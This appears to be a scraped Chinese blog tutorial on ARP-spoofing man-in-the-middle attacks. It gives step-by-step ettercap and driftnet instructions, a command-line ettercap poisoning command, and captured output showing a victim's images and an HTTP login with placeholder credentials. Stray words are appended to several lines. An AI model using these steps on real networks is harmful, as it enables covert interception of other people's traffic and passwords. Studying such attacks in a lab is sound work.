arp嗅探——ettercap+driftnet

时间  2020-02-05 标签 arp 嗅探 ettercap+driftnet ettercap driftnet

ARP:php

地址解析协议,根据IP地址查询MAC物理地址,以便进行物理网络通讯。ajax

 

ARP原理:缓存

A电脑192.168.1.2想与B电脑192.168.1.3通讯,网络通讯必需知道对方的MAC物理地址才能够传输数据,因此A电脑在网络上广播说:IP地址是192.168.1.3是谁,把你的MAC物理地址告诉我。不是B的电脑收到广播后发现跟本身无关,就不回话,只有B电脑进行回话告诉A本身的MAC物理地址。网络

 

ARP欺骗原理:app

C电脑192.168.1.7,MAC地址为xx.xx在网络上广播撒谎说:个人IP是192.168.1.1,个人MAC物理地址是xx.xx,收到消息的电脑都记住了这种假信息(存留在ARP缓存表里),今后之后发送给192.168.1.1的数据都会发给MAC地址xx.xx(192.168.1.7)C电脑了。url

 

攻击原理:通常家庭里电脑上网都会将数据发送给网关(路由器),若是让目标靶机电脑上的ARP缓存错误的存为攻击机的信息,攻击机就能够假装成网关,这样目标靶机全部数据都会发给攻击机,实现劫持。命令行

 

网关:192.168.1.1 (路由器)excel

靶机:192.168.1.8 (Windows XP)code

攻击机:192.168.1.7(Linux)orm

 

查看靶机ARP缓存信息:

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 ec-xx-xx-xx-xx-3f dynamic

 

开机攻击:

  1. 在攻击机上打开ettercap,点击Sniff->Unified sniffing->eth0
  2. Hosts->Scan for hosts
  3. Hosts->Host list
  4. 选择192.168.1.8靶机IP,点击Add to Target1,选择192.168.1.1网关点击Add to Target2
  5. Mitm->ARP poisoning->勾选Sniff remote connections,此时就已经对靶机进行了欺骗,到靶机上查看ARP缓存,发现192.168.1.1网关IP的MAC地址变成了攻击的MAC地址,这样发给网关的数据就会发送给攻击机了。

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 08-xx-xx-xx-xx-5e dynamic

192.168.1.7 08-xx-xx-xx-xx-5e dynamic

 

到查看靶机的图片

  1. 在攻击机上打开driftnet,执行命令driftnet -i eth0
  2. 此时,靶机浏览图片,在攻击机上能够查看到图片内容。
  3. 使用driftnet -i eth0 -d /root/Pictures -a能够将图片保存到指定目标
  4. 关掉ettercap中止嗅探,再查看靶机ARP缓存会发现又变回原来的信息了

C:\Documents and Settings\Administrator>arp -a

Interface: 192.168.1.8 --- 0x2

Internet Address Physical Address Type

192.168.1.1 ec-xx-xx-xx-xx-3f dynamic

 

嗅探靶机http网络帐号密码:

  1. 在攻击机上打开ettercap,点击Sniff->Unified sniffing->eth0
  2. Hosts->Scan for hosts
  3. Hosts->Host list
  4. 选择192.168.1.8靶机IP,点击Add to Target1,选择192.168.1.1网关点击Add to Target2
  5. Mitm->ARP poisoning->勾选Sniff remote connections
  6. Start->Start sniffing
  7. View->Connections能够查年到监听到的信息,双击信息可查看详细内容,如下监听到的网络帐号aaaaaaa密码bbbbbbb

POST /login.php?nowtime=1545925967777&verify=fba67eef HTTP/1.1.

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.

Referer: http://www.xxx.com/thread.php?fid=38.

Accept-Language: zh-cn.

Content-Type: application/x-www-form-urlencoded.

UA-CPU: x86.

Accept-Encoding: gzip, deflate.

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2).

Host: www.xxx.com.

Content-Length: 109.

Connection: Keep-Alive.

Cache-Control: no-cache.

Cookie: dd452_lastvisit=1769%091545925789%09%2Flogin.php%3Fnowtime1545925789701%26verifyfba67eef; dd452_lastpos=other; dd452_ol_offset=11543; dd452_ipstate=1545924020; _ac_app_ua=8a8f4074b5cc6c0ef5; dd452_cloudClientUid=5450535; dd452_threadlog=%2C38%2C..

jumpurl=http%3A%2F%2Fwww.xxx.com%2Fthread.php%3Ffid%3D38&step=2&ajax=1&pwuser=aaaaaaa&pwpwd=bbbbbbb&lgt=0

 

 

使用命令行:

攻击命令:

sudo ettercap -Tqi en0 -M arp:remote /192.168.1.4// /192.168.1.1// -l /tmp/log

会在/tmp下生成log.eci与log.ecp的文件,直接用etterlog就能够查看

etterlog log.ecp

联系我们 沪ICP备13005482号-10